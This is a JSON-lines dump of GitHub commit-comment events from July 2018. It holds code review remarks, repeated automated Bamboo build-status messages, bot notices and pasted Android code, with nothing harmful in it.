{"id":"7903474494","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559032,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-01T18:37:49Z","updated_at":"2018-07-01T18:37:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:37:49Z"}
{"id":"7903475226","type":"CommitCommentEvent","actor":{"login":"sticreations"},"repo":{"name":"ahmdrz/goinsta"},"payload":{"comment":{"id":29559033,"position":13,"line":351,"path":"goinsta.go","commit_id":"92e5e3badc3bbe8e5c67324dc7d3c258dafb547d","created_at":"2018-07-01T18:38:21Z","updated_at":"2018-07-01T18:38:21Z","author_association":"NONE","body":"Now There the Account will be nil without unmarshalling. Is there a different approach to this now?"}},"created_at":"2018-07-01T18:38:21Z"}
{"id":"7903476015","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559035,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-01T18:38:59Z","updated_at":"2018-07-01T18:38:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:38:59Z"}
{"id":"7903477471","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29559036,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T18:40:04Z","updated_at":"2018-07-01T18:40:04Z","author_association":"NONE","body":"Terrible fps in the program I run.  Downloaded the development files for ffmpeg 4.0 and still no luck compiling. same error message.  Configure shows no errors but when I run make -j24 it failed to compile.  Should I lower the number of parallel processes? what folder does avcodec.h live in, and where do I need to copy it, to make the compile finish?"}},"created_at":"2018-07-01T18:40:04Z"}
{"id":"7903477615","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559037,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-01T18:40:11Z","updated_at":"2018-07-01T18:40:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:40:11Z"}
{"id":"7903479074","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559039,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-01T18:41:12Z","updated_at":"2018-07-01T18:41:12Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-01T18:41:12Z"}
{"id":"7903479243","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559040,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-01T18:41:20Z","updated_at":"2018-07-01T18:41:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:41:20Z"}
{"id":"7903479509","type":"CommitCommentEvent","actor":{"login":"Jeans212"},"repo":{"name":"Jeans212/MathQuiz"},"payload":{"comment":{"id":29559041,"position":16,"line":12,"path":"readme.txt","commit_id":"4608a86cae0a2bd778764fce11e2f994f855ea26","created_at":"2018-07-01T18:41:31Z","updated_at":"2018-07-01T18:41:31Z","author_association":"OWNER","body":"The app is hosted on G-Drive  as an .apk file at https://drive.google.com/open?id=193KKIkDlDbb6oniNZUIMuVD7jdratMWx"}},"created_at":"2018-07-01T18:41:31Z"}
{"id":"7903480793","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559043,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-01T18:42:30Z","updated_at":"2018-07-01T18:42:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:42:30Z"}
{"id":"7903481372","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29559046,"position":null,"line":null,"path":null,"commit_id":"bde2fd342d00466d6242e573e54621a7bd0dc78f","created_at":"2018-07-01T18:42:55Z","updated_at":"2018-07-01T18:42:55Z","author_association":"CONTRIBUTOR","body":"Hi Igor,\r\nSince you shipped me an  A64-OLinuXino recently, I wonder why this WIP has been deleted ...\r\nIt is a duplicate of which other one ?"}},"created_at":"2018-07-01T18:42:55Z"}
{"id":"7903482004","type":"CommitCommentEvent","actor":{"login":"abedafnan"},"repo":{"name":"abedafnan/Score-Keeper"},"payload":{"comment":{"id":29559047,"position":null,"line":null,"path":null,"commit_id":"3ea68623149886ea4cfbe7b5956e391bb8057bce","created_at":"2018-07-01T18:43:25Z","updated_at":"2018-07-01T18:43:25Z","author_association":"OWNER","body":"some lines swapped places because of rearranging the code according to android preferences"}},"created_at":"2018-07-01T18:43:25Z"}
{"id":"7903482278","type":"CommitCommentEvent","actor":{"login":"schrum2"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29559048,"position":1,"line":1332,"path":"src/main/java/edu/southwestern/evolution/genotypes/TWEANNGenotype.java","commit_id":"a991bf744f82862a040374416182321c040471e5","created_at":"2018-07-01T18:43:39Z","updated_at":"2018-07-01T18:43:39Z","author_association":"OWNER","body":"This special case for LEO:\r\nJust use HyperNEATCPPNGenotype.numCPPNOutputsPerLayerPair instead (set in MMNEAT). This defines how many output neurons are needed per connected substrate pair. Additionally, the variable name numberOfNewSubstratePairs is misleading in this case ... it is actually the number of new CPPN output neurons to make. Whether using LEO or not, the number of added substrate pairs is the same.\r\n\r\n@DevonFulcher "}},"created_at":"2018-07-01T18:43:39Z"}
{"id":"7903482344","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559050,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-01T18:43:42Z","updated_at":"2018-07-01T18:43:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:43:42Z"}
{"id":"7903484041","type":"CommitCommentEvent","actor":{"login":"schrum2"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29559052,"position":9,"line":1337,"path":"src/main/java/edu/southwestern/evolution/genotypes/TWEANNGenotype.java","commit_id":"a991bf744f82862a040374416182321c040471e5","created_at":"2018-07-01T18:45:01Z","updated_at":"2018-07-01T18:45:01Z","author_association":"OWNER","body":"@DevonFulcher These arrays have a size of 0. This almost certainly causes an array index out of bounds exception."}},"created_at":"2018-07-01T18:45:01Z"}
{"id":"7903485672","type":"CommitCommentEvent","actor":{"login":"rnalrd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29559058,"position":9,"line":9,"path":"testing/sssd/APKBUILD","commit_id":"b80b5727962720f292f241ef5361509ceb0299f1","created_at":"2018-07-01T18:46:14Z","updated_at":"2018-07-01T18:46:14Z","author_association":"CONTRIBUTOR","body":"This isn't a valid license ID: https://spdx.org/licenses/"}},"created_at":"2018-07-01T18:46:14Z"}
{"id":"7903486153","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29559060,"position":16,"line":16,"path":"contracts/FundsSplitter.sol","commit_id":"cba4bc351bc451ba8a3cf7cb0699ad91286eea39","created_at":"2018-07-01T18:46:36Z","updated_at":"2018-07-01T18:46:36Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-01T18:46:36Z"}
{"id":"7903486237","type":"CommitCommentEvent","actor":{"login":"wkitty42"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29559061,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T18:46:40Z","updated_at":"2018-07-01T18:46:40Z","author_association":"CONTRIBUTOR","body":"On 07/01/2018 02:11 PM, Joshua Davidson wrote:\n> Further, there is not depth to the instrument, it just looks flat (as well\n> as some of the others).\n\nthey all look flat in the pictures gilberto provided... but look, let's take \nthis over to #1139 instead of keeping off-topic in here... at least #1139 was \ncreated specifically for this issue and discussion...\n\n"}},"created_at":"2018-07-01T18:46:40Z"}
{"id":"7903486436","type":"CommitCommentEvent","actor":{"login":"schrum2"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29559062,"position":18,"line":1346,"path":"src/main/java/edu/southwestern/evolution/genotypes/TWEANNGenotype.java","commit_id":"a991bf744f82862a040374416182321c040471e5","created_at":"2018-07-01T18:46:49Z","updated_at":"2018-07-01T18:46:49Z","author_association":"OWNER","body":"@DevonFulcher This special case for extraHNLinks should still not be here. Once again, just set\r\nposition = this.outputStartIndex() + (length of substrate connectivity list)"}},"created_at":"2018-07-01T18:46:49Z"}
{"id":"7903486992","type":"CommitCommentEvent","actor":{"login":"ahmedwagih1964"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29559064,"position":null,"line":null,"path":null,"commit_id":"51e935b8a653c72e22acc9c34282fe88da79dbf3","created_at":"2018-07-01T18:47:13Z","updated_at":"2018-07-01T18:47:13Z","author_association":"NONE","body":"*\r\n * Copyright (C) 2016 The Android Open Source Project\r\n *\r\n * Licensed under the Apache License, Version 2.0 (the \"License\");\r\n * you may not use this file except in compliance with the License.\r\n * You may obtain a copy of the License at\r\n *\r\n *      http://www.apache.org/licenses/LICENSE-2.0\r\n *\r\n * Unless required by applicable law or agreed to in writing, software\r\n * distributed under the License is distributed on an \"AS IS\" BASIS,\r\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n * See the License for the specific language governing permissions and\r\n * limitations under the License.\r\n */\r\npackage com.example.android.miwok;\r\n\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.support.v7.app.AppCompatActivity;\r\nimport android.view.View;\r\n\r\npublic class MainActivity extends AppCompatActivity {\r\n\r\n    @Override\r\n    protected void onCreate(Bundle savedInstanceState) {\r\n        super.onCreate(savedInstanceState);\r\n\r\n        // Set the content of the activity to use the activity_main.xml layout file\r\n        setContentView(R.layout.activity_main);\r\n    }\r\n\r\n    public void openNumbersList(View view){\r\n        Intent i = new Intent(this, NumbersActivity.class);\r\n        startActivity(i);\r\n\r\n    }\r\n}"}},"created_at":"2018-07-01T18:47:13Z"}
{"id":"7903487292","type":"CommitCommentEvent","actor":{"login":"rnalrd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29559065,"position":63,"line":63,"path":"testing/sssd/APKBUILD","commit_id":"b80b5727962720f292f241ef5361509ceb0299f1","created_at":"2018-07-01T18:47:25Z","updated_at":"2018-07-01T18:47:25Z","author_association":"CONTRIBUTOR","body":"This can be omitted altogether if only the default function is used"}},"created_at":"2018-07-01T18:47:25Z"}
{"id":"7903487830","type":"CommitCommentEvent","actor":{"login":"ahmedwagih1964"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29559066,"position":null,"line":null,"path":null,"commit_id":"51e935b8a653c72e22acc9c34282fe88da79dbf3","created_at":"2018-07-01T18:47:51Z","updated_at":"2018-07-01T18:47:51Z","author_association":"NONE","body":"`*\r\n * Copyright (C) 2016 The Android Open Source Project\r\n *\r\n * Licensed under the Apache License, Version 2.0 (the \"License\");\r\n * you may not use this file except in compliance with the License.\r\n * You may obtain a copy of the License at\r\n *\r\n *      http://www.apache.org/licenses/LICENSE-2.0\r\n *\r\n * Unless required by applicable law or agreed to in writing, software\r\n * distributed under the License is distributed on an \"AS IS\" BASIS,\r\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n * See the License for the specific language governing permissions and\r\n * limitations under the License.\r\n */\r\npackage com.example.android.miwok;\r\n\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.support.v7.app.AppCompatActivity;\r\nimport android.view.View;\r\n\r\npublic class MainActivity extends AppCompatActivity {\r\n\r\n    @Override\r\n    protected void onCreate(Bundle savedInstanceState) {\r\n        super.onCreate(savedInstanceState);\r\n\r\n        // Set the content of the activity to use the activity_main.xml layout file\r\n        setContentView(R.layout.activity_main);\r\n    }\r\n\r\n    public void openNumbersList(View view){\r\n        Intent i = new Intent(this, NumbersActivity.class);\r\n        startActivity(i);\r\n\r\n    }\r\n}`"}},"created_at":"2018-07-01T18:47:51Z"}
{"id":"7903487867","type":"CommitCommentEvent","actor":{"login":"EstherWaweru"},"repo":{"name":"EstherWaweru/QuizApp_Project"},"payload":{"comment":{"id":29559067,"position":null,"line":null,"path":null,"commit_id":"ca1f95c93cb161d88e742775828cffc3b5d18a6b","created_at":"2018-07-01T18:47:53Z","updated_at":"2018-07-01T18:47:53Z","author_association":"OWNER","body":"Its a project that i was given by udacity.Its about an educational app whereby i have used android basics to develop it"}},"created_at":"2018-07-01T18:47:53Z"}
{"id":"7903489177","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29559068,"position":null,"line":null,"path":null,"commit_id":"bde2fd342d00466d6242e573e54621a7bd0dc78f","created_at":"2018-07-01T18:48:43Z","updated_at":"2018-07-01T18:48:43Z","author_association":"MEMBER","body":"I had to remove one. This is correct conf:\r\nhttps://github.com/armbian/build/blob/master/config/boards/lime-a64.wip"}},"created_at":"2018-07-01T18:48:43Z"}
{"id":"7903489470","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29559069,"position":null,"line":null,"path":null,"commit_id":"6fb0a12f199d831f1e54438adfcd8049e8bcb774","created_at":"2018-07-01T18:48:56Z","updated_at":"2018-07-01T18:48:56Z","author_association":"NONE","body":"Thanks for scheduling this.  I'm especially curious because the additional threads will just be hyperthreads.  I ran a test of 18 vs 35 in the past and the hyperthreads were still helpful but that test was puny in comparison.\r\nhttp://tests.stockfishchess.org/tests/view/5add83d80ebc59625a6d5455\r\n"}},"created_at":"2018-07-01T18:48:56Z"}
{"id":"7903489631","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29559070,"position":null,"line":null,"path":null,"commit_id":"3fe20459eadcd47ca4eaf8c8c3300c71b9f0c7b0","created_at":"2018-07-01T18:49:02Z","updated_at":"2018-07-01T18:49:02Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-184901 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-184901\") to [dev](https://console.bluemix.net/apps/aefddd8a-f1fe-42b9-8ce4-8f726f960772?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T18:49:02Z"}
{"id":"7903490438","type":"CommitCommentEvent","actor":{"login":"ahmedwagih1964"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29559071,"position":null,"line":null,"path":null,"commit_id":"51e935b8a653c72e22acc9c34282fe88da79dbf3","created_at":"2018-07-01T18:49:39Z","updated_at":"2018-07-01T18:49:39Z","author_association":"NONE","body":"    public void openNumbersList(View view){\r\n        Intent i = new Intent(this, NumbersActivity.class);\r\n        startActivity(i);\r\n\r\n    }"}},"created_at":"2018-07-01T18:49:39Z"}
{"id":"7903493115","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29559073,"position":88,"line":92,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-01T18:51:30Z","updated_at":"2018-07-01T18:51:30Z","author_association":"NONE","body":"не удачный код, нельзя try catch использовать а-ля  if else"}},"created_at":"2018-07-01T18:51:30Z"}
{"id":"7903493636","type":"CommitCommentEvent","actor":{"login":"aayushKhandpur"},"repo":{"name":"aayushKhandpur/weightmaster"},"payload":{"comment":{"id":29559074,"position":12,"line":29,"path":"src/main/java/creativei/entity/Complaint.java","commit_id":"ae70922a5fc27cb6c2d5561d6df4d06587e526be","created_at":"2018-07-01T18:51:54Z","updated_at":"2018-07-01T18:51:54Z","author_association":"OWNER","body":"Amccontract and complaint will also have manytoone relationship. Please update"}},"created_at":"2018-07-01T18:51:54Z"}
{"id":"7903495565","type":"CommitCommentEvent","actor":{"login":"shinequasar"},"repo":{"name":"shinequasar/shinequasar"},"payload":{"comment":{"id":29559083,"position":null,"line":null,"path":null,"commit_id":"b3ced2272208466a6970eec9047def16d4316012","created_at":"2018-07-01T18:53:21Z","updated_at":"2018-07-01T18:53:21Z","author_association":"OWNER","body":"왜 이파일 수정했는지 남겨두기"}},"created_at":"2018-07-01T18:53:21Z"}
{"id":"7903495992","type":"CommitCommentEvent","actor":{"login":"NonglongSu"},"repo":{"name":"NonglongSu/hello-world"},"payload":{"comment":{"id":29559084,"position":13,"line":9,"path":"README.md","commit_id":"b001643b884fc71270fd84017482091c8f5c6db5","created_at":"2018-07-01T18:53:41Z","updated_at":"2018-07-01T18:53:41Z","author_association":"OWNER","body":"[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/NonglongSu/hello-world/master)"}},"created_at":"2018-07-01T18:53:41Z"}
{"id":"7903496804","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29559086,"position":null,"line":null,"path":null,"commit_id":"11d0c6ef5690c40e9481cc38e4567253b689b18c","created_at":"2018-07-01T18:54:19Z","updated_at":"2018-07-01T18:54:19Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-01T18:54:19Z"}
{"id":"7903500175","type":"CommitCommentEvent","actor":{"login":"kyleam"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29559090,"position":24,"line":6552,"path":"Documentation/magit.org","commit_id":"1e2f1686a16bbe05c12b59fb313d72486460c8ae","created_at":"2018-07-01T18:56:52Z","updated_at":"2018-07-01T18:56:52Z","author_association":"MEMBER","body":"Sorry, to stay closer to the original style, I probably should have made the more minimal change to \"A few additional commands ~that~ operate on a single file exist ~,that~ but are not available from the file popup by default\". The main thing I was trying to avoid was the \"on a single file exist, that are ..\" bit.  Please change the sentence as you see fit, but I'd recommend that you don't restore the original \", that\" dependent clause because I think a good number a readers will stumble a bit when trying to parse it.\r\n"}},"created_at":"2018-07-01T18:56:52Z"}
{"id":"7903500230","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyferret-feedstock"},"payload":{"comment":{"id":29559091,"position":null,"line":null,"path":null,"commit_id":"9ae113b90820051fc553c17202ba6f8a7016e759","created_at":"2018-07-01T18:56:55Z","updated_at":"2018-07-01T18:56:55Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @eugeneburger were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @eugeneburger were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T18:56:55Z"}
{"id":"7903502569","type":"CommitCommentEvent","actor":{"login":"SanketKini"},"repo":{"name":"SanketKini/website1"},"payload":{"comment":{"id":29559094,"position":null,"line":null,"path":null,"commit_id":"32610c8655580bc4e9c676d7058bf30f1e11d7a6","created_at":"2018-07-01T18:58:37Z","updated_at":"2018-07-01T18:58:37Z","author_association":"OWNER","body":"## Ipsum Really?\r\n\r\nSo we are really note able to find a better filler text"}},"created_at":"2018-07-01T18:58:37Z"}
{"id":"7903503803","type":"CommitCommentEvent","actor":{"login":"MikeWasson"},"repo":{"name":"mspnp/architecture-center"},"payload":{"comment":{"id":29559098,"position":5,"line":9,"path":"docs/sample-solutions/devops/devops-dotnet-webapp.md","commit_id":"b49aa61fb2c01b2fc0ef1f71a368a88e50a61a56","created_at":"2018-07-01T18:59:34Z","updated_at":"2018-07-01T18:59:34Z","author_association":"MEMBER","body":"This sentence feel like marketing to me; it doesn't really define what DevOps is. Can we use the definition from our [DevOps checklist](https://docs.microsoft.com/en-us/azure/architecture/checklist/dev-ops)?\r\n\r\n> DevOps is the integration of development, quality assurance, and IT operations into a unified culture and set of processes for delivering software. "}},"created_at":"2018-07-01T18:59:34Z"}
{"id":"7903505772","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/mod-individual-XP"},"payload":{"comment":{"id":29559107,"position":null,"line":null,"path":null,"commit_id":"327d5ab6d6545d0caeff92c3cc054e6e519214a4","created_at":"2018-07-01T19:00:46Z","updated_at":"2018-07-01T19:00:46Z","author_association":"MEMBER","body":"why do it like this? why not just set a check to set the character flag? so player does not receive xp"}},"created_at":"2018-07-01T19:00:46Z"}
{"id":"7903506565","type":"CommitCommentEvent","actor":{"login":"schrum2"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29559108,"position":13,"line":1339,"path":"src/main/java/edu/southwestern/evolution/genotypes/TWEANNGenotype.java","commit_id":"575c005acb6ccb3d87d1fddb41b9e4761f0813a2","created_at":"2018-07-01T19:01:18Z","updated_at":"2018-07-01T19:01:18Z","author_association":"OWNER","body":"@DevonFulcher Making an additional variable with the same value is unnecessary. Just use the one value.\r\n\r\nHowever, the main point I'm making is that the number 2 should not be hard coded here."}},"created_at":"2018-07-01T19:01:18Z"}
{"id":"7903506739","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29559109,"position":null,"line":null,"path":null,"commit_id":"bde2fd342d00466d6242e573e54621a7bd0dc78f","created_at":"2018-07-01T19:01:23Z","updated_at":"2018-07-01T19:01:23Z","author_association":"CONTRIBUTOR","body":"Ah ! Ok !\r\nWhy did you had to remove one ? menu too big ? :-P"}},"created_at":"2018-07-01T19:01:23Z"}
{"id":"7903506858","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29559110,"position":null,"line":null,"path":null,"commit_id":"2696a42ffce1721964d82a45c1eeec0e81727531","created_at":"2018-07-01T19:01:28Z","updated_at":"2018-07-01T19:01:28Z","author_association":"OWNER","body":"Note by instructor:\r\n\r\nShould you then always use pure components for your entire application?\r\nAnd how does this make sense if I also tell you to use functional components as often as possible where\r\nyou can't use this because you don't extend anything.\r\n\r\nWell the answer is you shouldn't use your component everywhere in your application.\r\n\r\nYou should only use it if you know that updates might not be required.\r\n\r\nOn the other hand you have components which might only depend on one or two props.\r\n\r\nAnd you know whenever updaters trigger for this component I want to update it because maybe I've got\r\na couple of pure components at top positions in this component which prevent the updating of any child\r\ncomponent anyways so don't make everything a pure component because you also can get a performance hit there in the end.\r\n\r\nThis implemented shouldComponentUpdate for you.\r\n\r\nAnd it compares all the old props and states to the new props and states.\r\n\r\nThere's of course also takes a bit of performance.\r\n\r\nAnd if you implement it somewhere where it will always succeed because you already did this check in\r\n\r\na higher point of these componentry then you're really hurting your application.\r\n\r\nSo not everything should be a pure component.\r\n\r\nSome strategically placed pure components make a lot of sense though.\r\n\r\nNow to find out where to place them.\r\n\r\nWe need to get a better understanding of how React walks through our component and how it actually\r\ndecides to really update the real DOM."}},"created_at":"2018-07-01T19:01:28Z"}
